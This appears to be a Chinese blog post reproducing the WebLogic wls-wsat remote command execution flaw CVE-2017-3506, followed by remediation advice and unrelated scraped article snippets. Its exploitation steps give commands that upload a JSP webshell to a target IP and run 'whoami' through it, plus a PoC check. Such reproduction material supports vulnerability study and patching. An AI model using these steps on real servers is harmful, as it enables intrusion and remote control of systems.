weblogic wls-wsat组件远程命令执行（CVE-2017-3506）

2023-11-11

所有文章，仅供安全研究与学习之用，后果自负!

weblogic wls-wsat组件远程命令执行（CVE-2017-3506）

前言

与weblogic 反序列化（CVE-2017-10271）类似

一般情况下weblogic会开放7001以及7002端口

0x01 漏洞描述

wls-wsat组件远程命令执行

如果访问/wls-wsat/CoordinatorPortType11目录，存在下图则说明或许存在漏洞
/wls-wsat/CoordinatorPortType
/wls-wsat/CoordinatorPortType11

在这里插入图片描述

0x02 影响范围

OracleWebLogic Server10.3.6.0.0

OracleWebLogic Server12.1.3.0.0

OracleWebLogic Server12.2.1.1.0

OracleWebLogic Server12.2.1.2.0

0x03 漏洞利用

工具：

cve-2017-3506_webshell.jar

(1)查看使用方法
java -jar cve-2017-3506_webshell.jar

在这里插入图片描述
(2)单个url检查
显示漏洞存在
java -jar cve-2017-3506_webshell.jar -u http://118.193.36.37:57661

(3)上传木马

payload

端口后边有个空格 
java -jar cve-2017-3506_webshell.jar  -s http://118.193.36.37:57661 /wls-wsat/CoordinatorPortType11 shell1.jsp

在这里插入图片描述
(4)执行命令
payload:

http://118.193.36.37:57661/wls-wsat/shell1.jsp?password=secfree&command=whoami

在这里插入图片描述

cve-2017-3506_poc.py 检测是否存在

python2运行
（1）运行查看使用方法
在这里插入图片描述
（2）检测是否存在漏洞

python2 cve-2017-3506_poc.py http://118.193.36.37:35509/

在这里插入图片描述

显示存在漏洞

0x04 漏洞修复

1.删除war包
根据实际环境路径和业务需求，删除WebLogic程序下列war包及目录
rm -f/home/WebLogic/Oracle/Middleware/wlserver_10.3/server/lib/wls-wsat.war
rm -f/home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war
rm -rf/home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat
2.设置网络访问控制
配置 http://ip_address:7001/wls-wsat 网络访问控制策略，禁止外网可以直接访问。
3.更新补丁和扫描:
更新Oracle官方发布相关补丁，下载链接： http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html 。
3.检测和防御
阿里云态势感知已增加检测规则，支持入侵行为和漏洞检测，建议您开通态势感知（专业版以上版本）进行检测。

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系:hwhale#tublm.com(使用前将#替换为@)

漏洞复现

jar

Java

weblogic wls-wsat组件远程命令执行（CVE-2017-3506）的相关文章

Java中字符串中特殊字符的替换

Java中如何替换字符串 E g String a adf sdf 如何替换和避免特殊字符您可以删除除此之外的所有字符可打印的 ASCII 范围 http en wikipedia org wiki ASCII ASCII printab
Eclipse 在源代码管理中保存操作

我们希望找到一种在签入之前执行代码标准的轻量级方法我们真的很喜欢使用 Eclipse 内置的想法保存操作 go to Preferences gt gt Java gt gt Editor gt gt Save Actions 其中有
org.apache.sling.api.resource,version=[2.3,3) -- 无法解析

您好我无法访问我的项目内容我已经上传了从 CQ 访问内容所需的所有包我唯一能看到的是 org apache sling api resource version 2 3 3 无法解析这是否是异常的原因如果是请告诉我如何解决中Q
比较两个文本文件的最快方法是什么，不将移动的行视为不同

我有两个文件非常大每个文件有 50000 行我需要比较这两个文件并识别更改然而问题是如果一条线出现在不同的位置它不应该显示为不同的例如考虑这个文件A txt xxxxx yyyyy zzzzz 文件B txt zzzzz xx
wait() 在游戏中如何工作？

在 playframework 的文档中here http www playframework org documentation 1 2 1 asynchronous已写 public static void loopWithoutBlo
Cassandra java驱动程序协议版本和连接限制不匹配

我使用的java驱动程序版本 2 1 4卡桑德拉版本 dsc cassandra 2 1 10cql 的输出给出以下内容 cqlsh 5 0 1 Cassandra 2 1 10 CQL spec 3 2 1 Native protocol
我需要什么库才能在 Java 中访问这个 com.sun.image.codec.jpeg？

我正在用java创建一个图像水印程序并导入了以下内容 import com sun image codec jpeg JPEGCodec import com sun image codec jpeg JPEGEncodeParam im
使用 AES SecretKey 的 Java KeyStore setEntry()

我目前正在 Java 中开发一个密钥处理类特别是使用 KeyStore 我正在尝试使用 AES 实例生成 SecretKey 然后使用 setEntry 方法将其放入 KeyStore 中我已经包含了代码的相关部分 The KS Obj
在 S3 中迭代对象时出现“ConnectionPoolTimeoutException”

我已经使用 aws java API 一段时间了没有遇到太多问题目前我使用的是库 1 5 2 版本当我使用以下代码迭代文件夹内的对象时 AmazonS3 s3 new AmazonS3Client new PropertiesCred
hibernate锁等待超时超时；

我正在使用 Hibernate 尝试模拟对数据库中同一行的 2 个并发更新编辑我将 em1 getTransaction commit 移至 em1 flush 之后我没有收到任何 StaleObjectException 两个事务已成
使用 SQLITE 按最近的纬度和经度坐标排序

我必须获得一个 SQLite SQL 语句以便在给定初始位置的情况下按最近的纬度和经度坐标进行排序这是我在 sqlite 数据库中的表的例句 SELECT id name lat lng FROM items EXAMPLE RESUL
Java 中的“Lambdifying”scala 函数

使用Java和Apache Spark 已用Scala重写面对旧的API方法 org apache spark rdd JdbcRDD构造函数其参数为 AbstractFunction1 abstract class AbstractF
编辑文件名在 JComboBox 中的显示方式，同时保持对文件的访问

我对 Java 很陌生对堆栈溢出也很陌生我正在尝试利用 JMF API 创建一个用 Java 编码的简单媒体播放器到目前为止我已经能够设置一个简单的队列播放列表来使用JComboBox called playListHolder
如何在selenium服务器上提供自定义功能？

我知道可以通过某种方法获得一些硒功能其中之一如下 driver getCapabilities getBrowserName 它返回浏览器名称的值但如果它指的是一个可用的方法如果我没有误解的话这似乎与自定义功能有关就像我的意思是
Java整数双除法混淆[重复]

这个问题在这里已经有答案了方案1 int sum 30 double avg sum 4 result is 7 0 not 7 5 VS 方案2 int sum 30 double avg sum 4 0 Prints lns 7 5
在 Spring 中重构这个的最佳方法？

private final ExecutorService executorParsers Executors newFixedThreadPool 10 public void parse List
Netty：阻止调用以获取连接的服务器通道？

呼吁ServerBootstrap bind 返回一个Channel但这不是在Connected状态因此不能用于写入客户端 Netty 文档中的所有示例都显示写入Channel从它的ChannelHandler的事件如channelCon
替换后增量

我自己已经有一个问题了但我想扩展它后增量示例 https stackoverflow com questions 51308967 post increment with example char a D int b 5 System o
将 Azure AD 高级自定义角色与 Spring Security 结合使用以进行基于角色的访问

我创建了一个演示 Spring Boot 应用程序我想在其中使用 AD 身份验证和授权并使用 AD 和 Spring Security 查看 Azure 文档我执行了以下操作 package com myapp contactdb c
调整添加的绘制组件的大小和奇怪的摆动行为

这个问题困扰了我好几天我正在制作一个特殊的绘画程序我制作了一个 JPanel 并添加了使用 Paint 方法绘制的自定义 jComponent 问题是每当我调整窗口大小时所有添加的组件都会消失或者只是不绘制因此我最终会得到一个

随机推荐

ubuntu安装ftp服务器(一般配置)

ubuntu安装ftp服务器 1 安装vsftpd sudo apt get install vsftpd ubuntu10 10自己装了这步省略 2 配置vsftpd 2 1 修改vsftpd的配置文件此类配置文件通常位于 etc 目
Mysql建立中英文全文索引（mysql5.7以上）

一概念使用索引是数据库性能优化的必备技能之一在MySQL数据库中有四种索引主键索引普通索引唯一索引以及我们这里将要介绍的全文索引 FUNLLTEXT INDEX MySQL全文检索是利用查询关键字和查询列内容之间的相关度进行检
innodb存储引擎探究（一）

mysql 体系结构和存储引擎数据库物理操作系统文件或者其他形式的文件实例 mysql数据库由一个共享内存区和后台进程组成启动mysql实例时会读取配置文件安装以下顺序 mysql体系结构 mysql插件式的一个存储引擎可以根据
java.nio.file.NoSuchFileException: /usr/share/elasticsearch/config/jvm.options es启动出错（解决）

今天重新搭建es的时候出现这个问题以及给相关的文件夹权限但是还是不可以这里提供一个解决问题的方法解决思路放弃自动挂载采用手动进行将容器内的文件粘贴出来问题解决 1 直接运行es docker run d name elastic
window编写代码，在ubuntu服务器上面远程训练yolov5

用途主要用来在window上面编写python相关代码使用ubuntu的依赖编写完成后在ubuntu上面进行训练此方法其实就是方便在window写代码而已因为它的代码都会同步到ubuntu上面的而且它在window上面的pyc
uniapp之scroll-view组件的练习使用（制作可滑动的菜单）

今天仔细研究了一下uniapp的scroll view组件使用顺便就做了一个可滑动的菜单点击后能够切换样式欢迎到https www uniapp club thread 57 htm交流学习其中还有用到其他知识点有 1 v for
React Native_手把手教你做项目(四.上拉加载更多）

在手机应用上上拉加载更多的功能是必不可少的同时在实际使用的时候当下拉加载数据仍未返回时用户多次重复进行下拉加载的操作为了不产生额外的垃圾数据我们需要进行判断同时为了更好的用户体验增加数据缓存功能 list js文件 Sa
1096C - Polygon for the Angle-几何-性质

思路根据几何性质正多边形所有三个点组成的角都是最小角的倍数然后根据内角公式可以求出正多边形最小角为多边形内角 n 2 然后打表发现 180边形最小角为1 最大角 178 所以只有 179无法
阿里巴巴Java开发规约插件p3c详细教程及使用感受

作者 13 GitHub https github com ZHENFENG13 版权声明本文为原创文章未经允许不得转载阿里巴巴Java开发手册在进入正题介绍这款插件之前首先来谈一下阿里巴巴Java开发手册 2017年年初首次
R和Python概率分布统计和Python验证独立性和平稳性时间序列

R概率分布和统计 R 基础知识汇总统计数据图形显示概率基础知识概率规则条件概率后验概率和贝叶斯可靠性离散分布介绍几何分布概率密度函数概率密度函数 pdf 定义为 P X x
Qt教程7--一个事件触发另一个

Qt教程一第七章一个事物领导另一个原文 QT3 1的帮助文档翻译 zieckey zieckey yahoo com cn 修改 zieckey zieckey yahoo com cn 这个例子显示了如何使用信号和槽来创建自定义窗口
【RDMA】最全RDMA学习教程（建议收藏）

目录 RDMA技术分享 RDMA技术分享 RDMA技术详解 RDMA编程 RDMA 网络 ROCE iWarp 性能优化配置和特性优化 Qos流控命令和测试文档和相关资料作者 bandaoyu 随时更新源文连接 https blo
图片上传的ajax代码,一个伪ajax图片上传代码实现示例

if FILES gt window parent ajaxUploadPicture uploadCallback http img0 bdstatic com img image 5099213b07eca8065380ce7f75e9
tensorflow官方教程：运用模型对类别进行预测

tensorflow官方教程运用模型对类别进行预测本文主要包含如下内容 tensorflow官方教程运用模型对类别进行预测 python版本 C代码本教程将会教你如何使用Inception v3 你将学会如何用Python或者C 把图
ubuntu 安装Fastdfs

安装fastdfs依赖插件libfastcommon 下载 https github com happyfish100 libfastcommon archive V1 0 39 tar gz 创建 usr local software 目
蓝桥杯 BEGIN-2 long long int的使用

include
机房环境监控系统的作用,环境与设备监控系统的作用

通信机房环境监控系统以下简称动环监控系统是指电源柜 UPS 监控远程通信远程调试远程控制即时监控其运行参数故障检测和处理记录和分析的有关数据对其设备空调电池等工业设备以及门磁红外渗水温湿度烟度等环境参数进行统一
别只盯着“四小龙”，CV的市场格局正在悄悄改变

大数据产业创新服务媒体聚焦数据改变商业在计算机视觉领域比较知名的是商汤旷视云从依图这四小龙他们不仅知名度更高收入水平和估值也更高从最新的财报来看这四小龙都不同程度陷入了困境收入增长乏力巨额亏损看不到扭转的态势四
crc16 ccitt的详细标准及其出处

CRC16 CCITT是一个16位的循环冗余校验 CRC 算法它是由国际电报电话咨询委员会 CCITT 制定的该算法被广泛用于通信领域以验证数据传输的完整性以下是CRC16 CCITT算法的详细标准多项式生成器 Polynomia
weblogic wls-wsat组件远程命令执行（CVE-2017-3506）

所有文章仅供安全研究与学习之用后果自负 weblogic wls wsat组件远程命令执行 CVE 2017 3506 前言与weblogic 反序列化 CVE 2017 10271 类似一般情况下weblogic会开放7001以及

热门标签